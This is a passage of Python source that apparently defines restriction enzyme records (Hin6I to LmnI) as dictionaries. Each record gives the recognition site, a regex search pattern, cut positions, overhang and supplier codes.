'compsite': '(?=(?P<Hin6I>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Hin6I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGC'),
'compsite': '(?=(?P<HinP1I>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HinP1I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTYRAC'),
'compsite': '(?=(?P<HincII>GT[CT][AG]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTYRAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N', 'O', 'Q', 'R', 'X'),
}
rest_dict['HincII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTYRAC'),
'compsite': '(?=(?P<HindII>GT[CT][AG]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTYRAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'M', 'S', 'V'),
}
rest_dict['HindII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'AAGCTT'),
'compsite': '(?=(?P<HindIII>AAGCTT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAGCTT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['HindIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GANTC'),
'compsite': '(?=(?P<HinfI>GA.TC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'ANT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GANTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'V', 'X', 'Y'),
}
rest_dict['HinfI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTTAAC'),
'compsite': '(?=(?P<HpaI>GTTAAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTAAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['HpaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<HpaII>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'Q', 'R', 'V', 'X'),
}
rest_dict['HpaII'] = _temp()
def _temp():
return {
'charac': (13, 7, None, None, 'GGTGA'),
'compsite': '(?=(?P<HphI>GGTGA))|(?=(?P<HphI_as>TCACC))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'N'),
}
rest_dict['HphI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTNNAC'),
'compsite': '(?=(?P<Hpy166II>GT..AC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNNAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy166II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TCNNGA'),
'compsite': '(?=(?P<Hpy178III>TC..GA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCNNGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy178III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCNGA'),
'compsite': '(?=(?P<Hpy188I>TC.GA))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCNGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy188I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TCNNGA'),
'compsite': '(?=(?P<Hpy188III>TC..GA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCNNGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy188III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCTYNA'),
'compsite': '(?=(?P<Hpy300XI>CCT[CT].A))|(?=(?P<Hpy300XI_as>T.[AG]AGG))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTYNA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy300XI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTNNAC'),
'compsite': '(?=(?P<Hpy8I>GT..AC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNNAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Hpy8I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CGWCG'),
'compsite': '(?=(?P<Hpy99I>CG[AT]CG))',
'dna': None,
'freq': 512.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'CGWCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGWCG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy99I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCTA'),
'compsite': '(?=(?P<Hpy99XIII>GCCTA))|(?=(?P<Hpy99XIII_as>TAGGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCTA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGWTAA'),
'compsite': '(?=(?P<Hpy99XIV>GG[AT]TAA))|(?=(?P<Hpy99XIV_as>TTA[AT]CC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWTAA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGWCNA'),
'compsite': '(?=(?P<Hpy99XIV_mut1>GG[AT]C.A))|(?=(?P<Hpy99XIV_mut1_as>T.G[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCNA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XIV_mut1'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCANNNNNNTRG'),
'compsite': '(?=(?P<Hpy99XXII>TCA......T[AG]G))|(?=(?P<Hpy99XXII_as>C[CT]A......TGA))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCANNNNNNTRG',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XXII'] = _temp()
def _temp():
return {
'charac': (11, 5, None, None, 'CCTTC'),
'compsite': '(?=(?P<HpyAV>CCTTC))|(?=(?P<HpyAV_as>GAAGG))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyAV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGTA'),
'compsite': '(?=(?P<HpyAXIV>GCGTA))|(?=(?P<HpyAXIV_as>TACGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGTA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyAXIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRTTAA'),
'compsite': '(?=(?P<HpyAXVI_mut1>C[AG]TTAA))|(?=(?P<HpyAXVI_mut1_as>TTAA[CT]G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTTAA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyAXVI_mut1'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRTCNA'),
'compsite': '(?=(?P<HpyAXVI_mut2>C[AG]TC.A))|(?=(?P<HpyAXVI_mut2_as>T.GA[CT]G))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTCNA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyAXVI_mut2'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<HpyCH4III>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyCH4III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGT'),
'compsite': '(?=(?P<HpyCH4IV>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyCH4IV'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TGCA'),
'compsite': '(?=(?P<HpyCH4V>TGCA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCA',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyCH4V'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCNNNNNNNGC'),
'compsite': '(?=(?P<HpyF10VI>GC.......GC))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNNNNNNGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['HpyF10VI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTNAG'),
'compsite': '(?=(?P<HpyF3I>CT.AG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTNAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['HpyF3I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGT'),
'compsite': '(?=(?P<HpySE526I>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['HpySE526I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CYANNNNNNNTRG'),
'compsite': '(?=(?P<HpyUM032XIII>C[CT]A.......T[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYANNNNNNNTRG',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM032XIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CYANNNNNNNTTC'),
'compsite': '(?=(?P<HpyUM032XIII_mut1>C[CT]A.......TTC))|(?=(?P<HpyUM032XIII_mut1_as>GAA.......T[AG]G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYANNNNNNNTTC',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM032XIII_mut1'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAAG'),
'compsite': '(?=(?P<HpyUM032XIV>GAAAG))|(?=(?P<HpyUM032XIV_as>CTTTC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAAG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM032XIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TNGGNAG|GTGGNAG'),
'compsite': '(?=(?P<HpyUM037X>T.GG.AG))|(?=(?P<HpyUM037X_as>CT.CC.A))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TNGGNAG|GTGGNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM037X'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<Hsp92I>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['Hsp92I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<Hsp92II>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['Hsp92II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGC'),
'compsite': '(?=(?P<HspAI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['HspAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTATNAC'),
'compsite': '(?=(?P<Jma19592I>GTAT.AC))|(?=(?P<Jma19592I_as>GT.ATAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Jma19592I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRGCRAC'),
'compsite': '(?=(?P<Jma19592II>G[AG]GC[AG]AC))|(?=(?P<Jma19592II_as>GT[CT]GC[CT]C))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCRAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Jma19592II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRNGAAT'),
'compsite': '(?=(?P<Jsp2502II>G[AG].GAAT))|(?=(?P<Jsp2502II_as>ATTC.[CT]C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRNGAAT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Jsp2502II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGCGCC'),
'compsite': '(?=(?P<KasI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['KasI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGGWCCC'),
'compsite': '(?=(?P<KflI>GGG[AT]CCC))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGWCCC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['KflI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTCGAG'),
'compsite': '(?=(?P<Kor51II>[AG]TCGAG))|(?=(?P<Kor51II_as>CTCGA[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Kor51II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRTGATT'),
'compsite': '(?=(?P<Kpn156V>C[AG]TGATT))|(?=(?P<Kpn156V_as>AATCA[CT]G))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTGATT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Kpn156V'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<Kpn2I>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Kpn2I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACATC'),
'compsite': '(?=(?P<Kpn327I>GACATC))|(?=(?P<Kpn327I_as>GATGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACATC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Kpn327I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GGTACC'),
'compsite': '(?=(?P<KpnI>GGTACC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTACC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['KpnI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTRGAG'),
'compsite': '(?=(?P<KpnNH25III>CT[AG]GAG))|(?=(?P<KpnNH25III_as>CTC[CT]AG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['KpnNH25III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTCNAC'),
'compsite': '(?=(?P<KpnNIH30III>GTTC.AC))|(?=(?P<KpnNIH30III_as>GT.GAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTCNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['KpnNIH30III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCYAAG'),
'compsite': '(?=(?P<KpnNIH50I>GC[CT]AAG))|(?=(?P<KpnNIH50I_as>CTT[AG]GC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCYAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['KpnNIH50I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCCGGC'),
'compsite': '(?=(?P<KroI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['KroI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGATCA'),
'compsite': '(?=(?P<Ksp22I>TGATCA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGATCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Ksp22I'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<Ksp632I>CTCTTC))|(?=(?P<Ksp632I_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ksp632I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTTAAC'),
'compsite': '(?=(?P<KspAI>GTTAAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTAAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['KspAI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<KspI>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['KspI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<Kzo9I>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Kzo9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CYAAANG'),
'compsite': '(?=(?P<Lba2029III>C[CT]AAA.G))|(?=(?P<Lba2029III_as>C.TTT[AG]G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYAAANG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lba2029III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACAAAG'),
'compsite': '(?=(?P<Lde4408II>ACAAAG))|(?=(?P<Lde4408II_as>CTTTGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACAAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lde4408II'] = _temp()
def _temp():
return {
'charac': (8, 4, None, None, 'GCTCTTC'),
'compsite': '(?=(?P<LguI>GCTCTTC))|(?=(?P<LguI_as>GAAGAGC))',
'dna': None,
'freq': 16384.0,
'fst3': 4,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCTTC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['LguI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGTKA'),
'compsite': '(?=(?P<LlaG50I>CCGT[GT]A))|(?=(?P<LlaG50I_as>T[AC]ACGG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGTKA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['LlaG50I'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'GCTCC'),
'compsite': '(?=(?P<LmnI>GCTCC))|(?=(?P<LmnI_as>GGAGC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['LmnI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCGCCG'),
